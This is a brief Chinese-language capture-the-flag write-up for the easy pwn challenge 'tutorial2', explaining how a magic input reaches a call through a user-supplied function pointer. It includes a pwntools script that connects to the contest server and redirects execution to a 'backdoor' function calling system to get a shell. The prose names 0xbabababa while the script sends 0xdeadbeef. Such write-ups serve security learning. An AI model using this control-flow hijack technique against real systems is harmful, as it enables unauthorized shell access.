[Pwn]tutorial2 xp0int Posted on Oct 28 2018 # tutorial2 <br> pwn送分题,打开ida发现,只需输入`0xbabababa`即可进入if,if中读取一个地址,并调用这个地址所指的函数。 ![](https://leanote.com/api/file/getImage?fileId=5bd31a7cab6441435a0052c5) <br> 在ida的函数列表中,我们发现一个函数会调用system,所以跳到这个函数即可。 ![](https://leanote.com/api/file/getImage?fileId=5bd31a7cab6441435a0052c6) <br> ```python from pwn import * # p = process('./tutorial2') p = remote('35.221.144.41',10004) elf = ELF('./tutorial2') p.recvuntil(':') p.send(p32(0xdeadbeef)) p.recvuntil('?') p.send(p32(elf.symbols['backdoor'])) p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Misc]bitcoin_base [Misc]加密了吗
没有帐号? 立即注册